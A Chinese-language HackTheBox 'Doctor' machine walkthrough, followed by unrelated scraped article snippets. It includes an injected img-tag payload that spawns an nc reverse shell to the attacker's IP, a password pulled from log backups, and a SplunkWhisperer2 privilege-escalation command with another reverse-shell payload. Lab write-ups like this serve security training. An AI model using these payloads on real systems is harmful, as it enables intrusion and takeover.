一只小白@
一只小白@

HTB Doctor

HTB Doctor(Easy)

地址:https://www.hackthebox.eu/home/machines/profile/278
基本信息
HTB Doctor_第1张图片在进行渗透之前需要将HTB与kali进行连接,建立连接之后才可以进行渗透
HTB Doctor_第2张图片

一、信息收集

HTB Doctor_第3张图片靶机地址为10.10.10.209
使用nmap对靶机进行扫描

nmap -sC -sV -sT -O -A 10.10.10.209

开放了22,80,8089三个端口
8089对应的服务为splunk
HTB Doctor_第4张图片

二、访问80端口

需要添加一条hosts命令才可以访问其他内容
HTB Doctor_第5张图片

三、访问doctors.htb

vim hosts
10.10.10.209 doctors.htb

HTB Doctor_第6张图片进入页面后尝试万能登陆密码,但是失败了

HTB Doctor_第7张图片
注册用户进行登录看看是否有可利用的信息,发现可能存在xss漏洞,可以构造xss代码反弹shell

<img src=http://10.10.14.3/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.3'$IFS'1234')>

HTB Doctor_第8张图片成功反弹,获取交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

进入home目录查看是否有可利用信息
在shaun目录下发现user.txt
在这里插入图片描述尝试查看,但是没有权限被拒绝
HTB Doctor_第9张图片通过其他途径进行权限的提升,最终在/var/log/apache2路径下发现backup文件
HTB Doctor_第10张图片

查看backup是否能够获得有用信息
筛选含有密码的记录

cat backup | grep password

在这里插入图片描述
切换shaun用户登录,查看user.txt但是这不是最终要获取的内容
需要提权到root权限才可以获得
HTB Doctor_第11张图片

四、提权

利用8089对应的服务为splunk进行提权

git clone https://github.com/cnotin/SplunkWhisperer2.git 复制到/htb/doctor文件夹下
cd SplunkWhisperer2/ 进入SplunkWhisperer2文件 
cd PySplunkWhisperer2/ 进入PySplunkWhisperer2文件 
chmod 777 PySplunkWhisperer2_remote.py 提权

在这里插入图片描述
HTB Doctor_第12张图片通过github中的使用方法进行操作
HTB Doctor_第13张图片

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.3 --username shaun --password Guitar123 --payload " "nc.traditional -e /bin/bash '10.10.14.3' '8888'"

HTB Doctor_第14张图片
HTB Doctor_第15张图片进入root目录获取root.txt
HTB Doctor_第16张图片

你可能感兴趣的:(Hack,The,Box)

  • FFplay文档解读-27-视频过滤器二 【零声教育】音视频开发进阶 音视频开发程序员编程音视频ffmpeg运维c++android
    29.11boxblur将boxblur算法应用于输入视频。它接受以下参数:luma_radius,lrluma_power,lpchroma_radius,crchroma_power,cpalpha_radius,aralpha_power,ap接下来的选项的描述如下:luma_radius,lrchroma_radius,cralpha_radius,ar设置用于模糊相应输入平面的框半径的表
  • QComboBox 天涯路s qtqt
    QComboBox是下拉列表框组件,它可以提供下拉列表供用户选择输入,也可以提供编辑框用于输入文字,所以QComboBox也被称为组合框。下拉列表框的下拉列表的每个项(item,或称为列表项)可以存储一个或多个QVariant类型的用户数据,用户数据并不显示在界面上。一.QComboBox类1.QComboBox类的属性和接口函数QComboBox类的主要属性如表所示:QComboBox类的主要属
  • 23.Harmonyos Next仿uv-ui 组件NumberBox 步进器组件基础用法 harmonyos-next
    温馨提示:本篇博客的详细代码已发布到git:https://gitcode.com/nutpi/HarmonyosNext可以下载运行哦!1.组件介绍NumberBox步进器是HarmonyOSNEXT中一个实用的数字输入交互组件,它允许用户通过点击按钮或直接输入来增加或减少数值。本文将详细介绍NumberBox步进器组件的基础用法,帮助开发者快速上手使用这一组件。2.效果展示3.基础用法3.1引
  • 从零开始学习黑客技术,看这一篇就够了 网络安全-旭师兄 学习web安全python密码学网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包黑客,对于很多人来说,是一个神秘的代名词,加之影视作品夸张的艺术表现,使得黑客这个本来只专注于技术的群体,散发出亦正亦邪的神秘色彩。黑客源自英文hacker一词,最初曾指热心于计算机技术、水平高超的电脑高手,尤其是程序设计人员,逐渐区分为白帽、灰帽、黑帽等。其中,白帽黑客被称为道德黑客。他们不会非法入侵用户网络,而是通过一系列测试检查
  • 七个合法学习黑客技术的平台,让你从萌新成为大佬 黑客白帽子黑爷 学习php开发语言web安全网络
    1、HackThisSite提供在线IRC聊天和论坛,让用户交流更加方便。网站涵盖多种主题,包括密码破解、网络侦察、漏洞利用、社会工程学等。非常适用于个人提高网络安全技能2、HackaDay涵盖多个领域,包括黑客技术、科技、工程和DIY等内容,站内提供大量有趣的文章、视频、教程和新闻,帮助用户掌握黑客技术和DIY精神。3、OffensiveSecurity一个专门提供网络安全培训和认证的公司,课程
  • QT之QComboBox详细介绍 小小怪同学の qt开发语言
    此篇文章来源于自己在使用QComboBox类的时候相对其重写而总结的其成员函数知识点,本人能力有限,欢迎大家评论区评论,共同学习一、QComboBox介绍QComboBox是QtGUI库中的一个核心组件,它是一个复合型图形用户界面控件,常用于提供一种紧凑的方式来展示可选项列表。QComboBox通常表现为一个下拉列表框,包含一个文本标签区域和一个下拉箭头按钮,点击箭头时会显示出可供选择的项目列表。
  • 整理一下arcGis desktop版本软件, 从入门到精通需要学习的知识点 AnalogElectronic arcgis学习
    整理一下arcGisdesktop版本软件,从入门到精通需要学习的知识点以下是一份关于ArcGISDesktop从入门到精通的学习知识点整理:一、软件初认识与基础操作软件初认识:了解ArcGISDesktop的界面布局,包括内容列表、ArcToolbox工具箱、结果窗口、地图窗口、目录窗口、搜索窗口、python编程窗口以及其他常用工具条等。数据添加与管理:掌握通过不同方式添加数据,如图层列表右键
  • 【DeepSeek问答】Qt布局和控件的关系 CSUC qt
    在Qt中,布局管理器(Layout)与控件(Widget)的关系是容器与内容的关系。布局负责自动管理控件的排列、尺寸调整和自适应,确保界面在不同窗口尺寸下保持美观和功能。以下是详细说明及用法示例:一、布局与控件的关系容器与内容:布局(如QVBoxLayout、QHBoxLayout)作为容器,管理其内部控件的位置和大小。控件(如QPushButton、QLabel)是布局中的内容,通过addWid
  • 用Python实现PDF转Doc格式小程序 Bruce_xiaowei 总结经验笔记编程pythonpdf小程序
    用Python实现PDF转Doc格式小程序以下是一个使用Python实现PDF转DOC格式的GUI程序,采用Tkinter和pdf2docx库:importtkinterastkfromtkinterimportfiledialog,messageboxfrompdf2docximportConverterimportosclassPDFtoDOCConverter:def__init__(sel
  • curl不通 k8s_【K8S排错】在集群的POD内不能访问clusterIP和service weixin_39950057 curl不通k8s
    排错背景:在一次生产环境的部署过程中,配置文件中配置的访问地址为集群的Service,配置好后发现服务不能正常访问,遂启动了一个busybox进行测试,测试发现在busybox中,能通过coredns正常的解析到IP,然后去ping了一下service,发现不能ping通,pingclusterIP也不能ping通。排错经历:首先排查了kube-proxy是否正常,发现启动都是正常的,然后也重启了
  • 25.Harmonyos Next仿uv-ui 组件 NumberBox 步进器组件范围限制 harmonyos-next
    温馨提示:本篇博客的详细代码已发布到git:https://gitcode.com/nutpi/HarmonyosNext可以下载运行哦!1.组件介绍NumberBox步进器组件的范围限制功能允许开发者设置数值的最小值和最大值,确保用户输入或调整的数值在合理的范围内。本文将详细介绍如何在HarmonyOSNEXT中设置和使用NumberBox步进器的范围限制功能。2.效果展示3.范围限制设置3.1
  • 点云数据处理--splat转3dtiles gaohualan 3dpython数据结构算法
    文章目录处理流程简介核心功能实现数据读取与格式转换定义Point类数据读取splat转gltf点云数据分割定义四叉树递归生成3dtiles瓦片生成tileset.json递归生成tileset.json计算box主函数调用渲染下一步工作性能优化渲染效果调优其他源码地址:github处理流程简介基本流程:读取点云数据。制作tile构建四叉树分割点云将点云转换为glTF格式。生成配置文件tileset
  • Anchor开发指南 web3
    参考文档:Hackquest:https://www.hackquest.io/zhSolana中文:https://www.solana-cn.com/SolanaDocumention/core/cpl.htmlAnchor官网:https://www.anchor-lang.com/docs/cross-program-invocations更多更及时的文章请访问作者博客原文链接:https
  • IIC通信卡死的两种情况和解决方案 三块石头101 通信硬件工程智能手机信息与通信信号处理单片机mcu驱动开发
    本文主要记录了两例IIC通信失败的典型案例,失效器件均为IMU,实际上其他使用IIC接口的Device也会存在类似情况。这里汇总实际项目开发过程中遇到的IIC的典型问题和对应的解决方案,希望可以给正在应用IIC的同学提供参考。IMU作为GPS惯导实现的重要器件,也是哨兵模式功能实现的基础,在座舱、tBOX等控制器中大量应用。GPS惯导和哨兵模式本身并不是体验感非常明显的功能,甚至很多驾驶人实际不怎
  • 白盒测试基础知识-辅助理解 Ben_F 系统架构功能测试
    类别详细内容定义白盒测试(WhiteBoxTesting)是一种基于代码内部结构和逻辑的测试方法,测试人员需要了解程序的内部实现细节。别名结构测试、透明盒测试、玻璃盒测试、逻辑驱动测试测试对象程序的源代码、内部结构、逻辑路径、控制流、数据流等测试目标验证代码的正确性、逻辑覆盖、路径覆盖、边界条件等主要技术-语句覆盖:确保每条语句至少执行一次。-分支覆盖:确保每个分支(如if-else)至少执行一次
  • 前端常用布局 ox0080 #北漂+滴滴出行VIP激励WebCSS前端布局html
    1.传统两栏布局+响应式适配文件名:traditional-two-column.html传统两栏布局示例*{margin:0;padding:0;box-sizing:border-box;}/*导航栏*/.nav{background:#2c3e50;padding:1rem;color:white;}/*主体容器*/.container{overflow:hidden;/*清除浮动*/}/*
  • 为什么打开串口的提示窗口都提示两遍 可可乐不加冰 软件报错问题命令模式
    问题根源分析在ModbusRTU类中,initializePort方法会在打开串口时通过emitportOpened(true)发送信号。如果MainWindow类中同时通过以下两种方式触发弹窗,就会导致提示重复:直接弹窗:在按钮点击事件中手动调用QMessageBox::information。信号槽弹窗:将portOpened信号连接到另一个显示弹窗的槽函数。解决方案1.移除冗余弹窗逻辑修改M
  • CSS flex-shrink 属性 shengyin714959 笔记csscss3前端
    实例A,B,C设置flex-shrink:1,D,E设置为flex-shrink:2:菜鸟教程(runoob.com)#content{display:flex;width:500px;}#contentdiv{flex-basis:120px;border:3pxsolidrgba(0,0,0,.2);}.box{flex-shrink:1;}.box1{flex-shrink:2;}div总宽
  • adb命令、adb shell与Linux各种命令(busybox) 猫猫猫猫猫大人 LinuxFedoraAndroid
    常用的ADB命令1.显示系统中全部Android平台:androidlisttargets2.显示系统中全部AVD(模拟器):androidlistavd3.创建AVD(模拟器):androidcreateavd--name名称--target平台编号4.启动模拟器:emulator-avd名称-sdcard~/名称.img(-skin1280x800)5.删除AVD(模拟器):androidde
  • 【黑盒测试与白盒测试】 CircuitWizard java-ee
    一、黑盒测试(BlackBoxTesting)黑盒测试是一种功能测试方法,测试人员仅关注软件的外部行为和输入输出关系,而无需了解内部代码实现。其核心思想是验证软件是否满足用户需求和功能规格。特点:以用户视角测试:模拟真实用户操作不依赖代码实现:适用于需求验证覆盖功能场景:包括正常/异常输入、边界值等常用测试类型:功能测试回归测试兼容性测试性能测试典型示例:登录功能测试输入正确用户名和密码→跳转至主
  • lvgl ---spinbox微调框 weixin_44799641 LVGL的学习c语言
    staticlv_obj_t*spinbox;staticvoidlv_spinbox_increment_event_cb(lv_event_t*e){lv_event_code_tcode=lv_event_get_code(e);if(code==LV_EVENT_SHORT_CLICKED||code==LV_EVENT_LONG_PRESSED_REPEAT){lv_spinbox_in
  • 搭建测试用的redis集群 访问失败小记 yinhezhanshen redisgolang
    redis运行在virtualbox虚拟机的ubuntu中。golang编写的redis客户端代码运行在windows下。首先在ubuntu下启动redis集群下载redis源码,编译成功后,进入utils/create-cluster目录,运行./create-clusterstart./create-clustercreate在windows下编写访问redis代码packagemainimp
  • VBS收集电脑配置信息 大刘讲IT 技术VBS资产VBS资产收集资产
    以下是VBS代码收集电脑硬件配置信息的代码(CSV列表生成的形式):注意文件存储路径的修改,可存储在共享,也可以本地!要注意360的屏蔽,这个同样可以写入SQL!在后面部分稍加修改即可,有需要可以留言!ONERRORRESUMENEXTTemp=0SetWSHNetwork=WScript.CreateObject("WScript.Network")UserName=InputBox("本次为I
  • css动画实现铃铛效果 木心操作 CSScss前端css3
    代码*,*::after,*::before{margin:0;padding:0;box-sizing:border-box;}body{width:100%;height:100vh;background-color:#1d1d1d;display:flex;justify-content:center;align-items:center;}.notification{width:200px
  • Cesium初级开发教程之四:天空球#近景天空球 CesiumMaster Cesium开发教程前端javascripthtmlCesium
    一、简介在Cesium默认展示太空背景(SkyBox)和大气层效果(SkyAtmosphere),要实现近景天空盒(SkyBox)通常用于替代默认的太空背景,创建室内环境、封闭场景或近距离天空效果(如云层穹顶)二、效果图三、代码viewer.scene.skyAtmosphere.show=false;//关闭大气层
  • 前端开发中如何使用ChatGPT辅助开发? 破碎的天堂鸟 学习教程chatgpt
    以下是前端开发中使用ChatGPT辅助开发的完整指南,涵盖核心应用场景、实践方法及注意事项:一、代码生成与优化基础代码生成HTML/CSS/JS框架搭建:通过自然语言描述需求(如"生成带导航栏的响应式页面"),ChatGPT可快速生成结构清晰的代码骨架。例如,输入“用Flexbox实现垂直水平居中布局”,可得到包含justify-content和align-items属性的代码[1][32]。组件
  • echarts如何修改数据视图dataView中的样式 爱人间 echartsecharts数据视图格式自定义
    做了一个现实折线图的图表,通过右上角icon可以自由切换成柱状图,表格。在表格中遇到的一点小问题,解决方案如下:1、场景重现这是一个显示两个折线图的图表,一切看起来都很顺利。但是点击红色箭头所指的图标,这个作用就是以表格的形式展现。展现如下。很丑是吧,测试姐姐说一定要改掉。附加一下右上角的实现代码,在options配置项加下面的配置就OK。//右上角切换实现方法toolbox:{show:true
  • Tinder多开 电脑多开软件 segmentfault
    Tinder多开电脑多开软件Tinder多开,Tinder电脑多开支持不限开设更多的Tinder多开,Tinder客户端,方便统壹管理,开设多少个Tinder多开,Tinder客户端取决於你的电脑性能配置,壹般普通的都可以下载网址:http://www.safeboxie.com
  • 【OpenAPI】票证图像检测和矫正 勇敢牛牛_ oneapioneapi目标检测
    API简介检测一张图片中是否存在票证(发票、银行卡、证件等),如果存在则返回置信度、边界框以及提取出的票证图像。API信息接口地址:https://oneapi.coderbox.cn/openapi/api/detect/ticket-correction请求方式:POST调用类型:同步接口参数BODY参数参数名类型必填含义说明imageUrlstring是待检测的图片地址图片大需小于3M响应参
  • 使用pdfbox实现在PDF文件中添加图片
    业务希望实现一个类似于电子签章的功能,但又不想花钱买电子签章服务。那么如何在PDF上签章图片呢?我们拆分一下问题:如何添加图片到PDF图片上?如何在固定位置上添加图片?Apache提供了pdfbox解决方案,我们就利用它去实现我们要做功能。添加依赖org.apache.pdfboxpdfbox2.0.32获取需要盖章的坐标信息publicclassGetCharLocationAndSizeext
  • java封装继承多态等 麦田的设计者 javaeclipsejvmcencapsulatopn
           最近一段时间看了很多的视频却忘记总结了,现在只能想到什么写什么了,希望能起到一个回忆巩固的作用。     1、final关键字       译为:最终的        &
  • F5与集群的区别 bijian1013 weblogic集群F5
            http请求配置不是通过集群,而是F5;集群是weblogic容器的,如果是ejb接口是通过集群。         F5同集群的差别,主要还是会话复制的问题,F5一把是分发http请求用的,因为http都是无状态的服务,无需关注会话问题,类似
  • LeetCode[Math] - #7 Reverse Integer Cwind java题解MathLeetCodeAlgorithm
    原题链接:#7 Reverse Integer   要求: 按位反转输入的数字 例1: 输入 x = 123, 返回 321 例2: 输入 x = -123, 返回 -321   难度:简单   分析: 对于一般情况,首先保存输入数字的符号,然后每次取输入的末位(x%10)作为输出的高位(result = result*10 + x%10)即可。但
  • BufferedOutputStream 周凡杨
         首先说一下这个大批量,是指有上千万的数据量。      例子:      有一张短信历史表,其数据有上千万条数据,要进行数据备份到文本文件,就是执行如下SQL然后将结果集写入到文件中!      select t.msisd
  • linux下模拟按键输入和鼠标 被触发 linux
    查看/dev/input/eventX是什么类型的事件, cat /proc/bus/input/devices 设备有着自己特殊的按键键码,我需要将一些标准的按键,比如0-9,X-Z等模拟成标准按键,比如KEY_0,KEY-Z等,所以需要用到按键 模拟,具体方法就是操作/dev/input/event1文件,向它写入个input_event结构体就可以模拟按键的输入了。 linux/in
  • ContentProvider初体验 肆无忌惮_ ContentProvider
    ContentProvider在安卓开发中非常重要。与Activity,Service,BroadcastReceiver并称安卓组件四大天王。 在android中的作用是用来对外共享数据。因为安卓程序的数据库文件存放在data/data/packagename里面,这里面的文件默认都是私有的,别的程序无法访问。 如果QQ游戏想访问手机QQ的帐号信息一键登录,那么就需要使用内容提供者COnte
  • 关于Spring MVC项目(maven)中通过fileupload上传文件 843977358 mybatisspring mvc修改头像上传文件upload
    Spring MVC 中通过fileupload上传文件,其中项目使用maven管理。   1.上传文件首先需要的是导入相关支持jar包:commons-fileupload.jar,commons-io.jar 因为我是用的maven管理项目,所以要在pom文件中配置(每个人的jar包位置根据实际情况定) <!-- 文件上传 start by zhangyd-c --&g
  • 使用svnkit api,纯java操作svn,实现svn提交,更新等操作 aigo svnkit
     原文:http://blog.csdn.net/hardwin/article/details/7963318   import java.io.File; import org.apache.log4j.Logger; import org.tmatesoft.svn.core.SVNCommitInfo; import org.tmateso
  • 对比浏览器,casperjs,httpclient的Header信息 alleni123 爬虫crawlerheader
    @Override protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { String type=req.getParameter("type"); Enumeration es=re
  • java.io操作 DataInputStream和DataOutputStream基本数据流 百合不是茶 java
    1,java中如果不保存整个对象,只保存类中的属性,那么我们可以使用本篇文章中的方法,如果要保存整个对象  先将类实例化  后面的文章将详细写到     2,DataInputStream 是java.io包中一个数据输入流允许应用程序以与机器无关方式从底层输入流中读取基本 Java 数据类型。应用程序可以使用数据输出流写入稍后由数据输入流读取的数据。
  • 车辆保险理赔案例 bijian1013 车险
    理赔案例: 一货运车,运输公司为车辆购买了机动车商业险和交强险,也买了安全生产责任险,运输一车烟花爆竹,在行驶途中发生爆炸,出现车毁、货损、司机亡、炸死一路人、炸毁一间民宅等惨剧,针对这几种情况,该如何赔付。 赔付建议和方案: 客户所买交强险在这里不起作用,因为交强险的赔付前提是:“机动车发生道路交通意外事故”; 如果是交通意外事故引发的爆炸,则优先适用交强险条款进行赔付,不足的部分由商业
  • 学习Spring必学的Java基础知识(5)—注解 bijian1013 javaspring
            文章来源:http://www.iteye.com/topic/1123823,整理在我的博客有两个目的:一个是原文确实很不错,通俗易懂,督促自已将博主的这一系列关于Spring文章都学完;另一个原因是为免原文被博主删除,在此记录,方便以后查找阅读。           有必要对
  • 【Struts2一】Struts2 Hello World bit1129 Hello world
    Struts2 Hello World应用的基本步骤 创建Struts2的Hello World应用,包括如下几步: 1.配置web.xml 2.创建Action 3.创建struts.xml,配置Action 4.启动web server,通过浏览器访问   配置web.xml <?xml version="1.0" encoding="
  • 【Avro二】Avro RPC框架 bit1129 rpc
    1. Avro RPC简介 1.1. RPC RPC逻辑上分为二层,一是传输层,负责网络通信;二是协议层,将数据按照一定协议格式打包和解包 从序列化方式来看,Apache Thrift 和Google的Protocol Buffers和Avro应该是属于同一个级别的框架,都能跨语言,性能优秀,数据精简,但是Avro的动态模式(不用生成代码,而且性能很好)这个特点让人非常喜欢,比较适合R
  • lua set get cookie ronin47 lua cookie
    lua: local access_token = ngx.var.cookie_SGAccessToken if access_token then ngx.header["Set-Cookie"] = "SGAccessToken="..access_token.."; path=/;Max-Age=3000" end
  • java-打印不大于N的质数 bylijinnan java
    public class PrimeNumber { /** * 寻找不大于N的质数 */ public static void main(String[] args) { int n=100; PrimeNumber pn=new PrimeNumber(); pn.printPrimeNumber(n); System.out.print
  • Spring源码学习-PropertyPlaceholderHelper bylijinnan javaspring
    今天在看Spring 3.0.0.RELEASE的源码,发现PropertyPlaceholderHelper的一个bug 当时觉得奇怪,上网一搜,果然是个bug,不过早就有人发现了,且已经修复: 详见: http://forum.spring.io/forum/spring-projects/container/88107-propertyplaceholderhelper-bug
  • [逻辑与拓扑]布尔逻辑与拓扑结构的结合会产生什么? comsci 拓扑
       如果我们已经在一个工作流的节点中嵌入了可以进行逻辑推理的代码,那么成百上千个这样的节点如果组成一个拓扑网络,而这个网络是可以自动遍历的,非线性的拓扑计算模型和节点内部的布尔逻辑处理的结合,会产生什么样的结果呢?    是否可以形成一种新的模糊语言识别和处理模型呢?  大家有兴趣可以试试,用软件搞这些有个好处,就是花钱比较少,就算不成
  • ITEYE 都换百度推广了 cuisuqiang GoogleAdSense百度推广广告外快
    以前ITEYE的广告都是谷歌的Google AdSense,现在都换成百度推广了。   为什么个人博客设置里面还是Google AdSense呢?   都知道Google AdSense不好申请,这在ITEYE上也不是讨论了一两天了,强烈建议ITEYE换掉Google AdSense。至少,用一个好申请的吧。   什么时候能从ITEYE上来点外快,哪怕少点
  • 新浪微博技术架构分析 dalan_123 新浪微博架构
    新浪微博在短短一年时间内从零发展到五千万用户,我们的基层架构也发展了几个版本。第一版就是是非常快的,我们可以非常快的实现我们的模块。我们看一下技术特点,微博这个产品从架构上来分析,它需要解决的是发表和订阅的问题。我们第一版采用的是推的消息模式,假如说我们一个明星用户他有10万个粉丝,那就是说用户发表一条微博的时候,我们把这个微博消息攒成10万份,这样就是很简单了,第一版的架构实际上就是这两行字。第
  • 玩转ARP攻击 dcj3sjt126com r
    我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情,盖不负责。 网上关于ARP的资料已经很多了,就不用我都说了。 用某一位高手的话来说,“我们能做的事情很多,唯一受限制的是我们的创造力和想象力”。 ARP也是如此。 以下讨论的机子有 一个要攻击的机子:10.5.4.178 硬件地址:52:54:4C:98
  • PHP编码规范 dcj3sjt126com 编码规范
    一、文件格式 1. 对于只含有 php 代码的文件,我们将在文件结尾处忽略掉 "?>" 。这是为了防止多余的空格或者其它字符影响到代码。例如:<?php$foo = 'foo';2. 缩进应该能够反映出代码的逻辑结果,尽量使用四个空格,禁止使用制表符TAB,因为这样能够保证有跨客户端编程器软件的灵活性。例
  • linux 脱机管理(nohup) eksliang linux nohupnohup
    脱机管理 nohup 转载请出自出处:http://eksliang.iteye.com/blog/2166699 nohup可以让你在脱机或者注销系统后,还能够让工作继续进行。他的语法如下 nohup [命令与参数] --在终端机前台工作 nohup [命令与参数] & --在终端机后台工作   但是这个命令需要注意的是,nohup并不支持bash的内置命令,所
  • BusinessObjects Enterprise Java SDK greemranqq javaBOSAPCrystal Reports
    最近项目用到oracle_ADF  从SAP/BO 上调用 水晶报表,资料比较少,我做一个简单的分享,给和我一样的新手 提供更多的便利。   首先,我是尝试用JAVA JSP 去访问的。   官方API:http://devlibrary.businessobjects.com/BusinessObjectsxi/en/en/BOE_SDK/boesdk_ja
  • 系统负载剧变下的管控策略 iamzhongyong 高并发
    假如目前的系统有100台机器,能够支撑每天1亿的点击量(这个就简单比喻一下),然后系统流量剧变了要,我如何应对,系统有那些策略可以处理,这里总结了一下之前的一些做法。 1、水平扩展 这个最容易理解,加机器,这样的话对于系统刚刚开始的伸缩性设计要求比较高,能够非常灵活的添加机器,来应对流量的变化。 2、系统分组 假如系统服务的业务不同,有优先级高的,有优先级低的,那就让不同的业务调用提前分组
  • BitTorrent DHT 协议中文翻译 justjavac bit
    前言 做了一个磁力链接和BT种子的搜索引擎 {Magnet & Torrent},因此把 DHT 协议重新看了一遍。 BEP: 5Title: DHT ProtocolVersion: 3dec52cb3ae103ce22358e3894b31cad47a6f22bLast-Modified: Tue Apr 2 16:51:45 2013 -070
  • Ubuntu下Java环境的搭建 macroli java工作ubuntu
    配置命令:   $sudo apt-get install ubuntu-restricted-extras   再运行如下命令:   $sudo apt-get install sun-java6-jdk   待安装完毕后选择默认Java.   $sudo update- alternatives --config java   安装过程提示选择,输入“2”即可,然后按回车键确定。
  • js字符串转日期(兼容IE所有版本) qiaolevip TODateStringIE
    /** * 字符串转时间(yyyy-MM-dd HH:mm:ss) * result (分钟) */ stringToDate : function(fDate){ var fullDate = fDate.split(" ")[0].split("-"); var fullTime = fDate.split("
  • 【数据挖掘学习】关联规则算法Apriori的学习与SQL简单实现购物篮分析 superlxw1234 sql数据挖掘关联规则
    关联规则挖掘用于寻找给定数据集中项之间的有趣的关联或相关关系。 关联规则揭示了数据项间的未知的依赖关系,根据所挖掘的关联关系,可以从一个数据对象的信息来推断另一个数据对象的信息。 例如购物篮分析。牛奶 ⇒ 面包 [支持度:3%,置信度:40%] 支持度3%:意味3%顾客同时购买牛奶和面包。 置信度40%:意味购买牛奶的顾客40%也购买面包。 规则的支持度和置信度是两个规则兴
  • Spring 5.0 的系统需求,期待你的反馈 wiselyman spring
                   Spring 5.0将在2016年发布。Spring5.0将支持JDK 9。          Spring 5.0的特性计划还在工作中,请保持关注,所以作者希望从使用者得到关于Spring 5.0系统需求方面的反馈。  
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他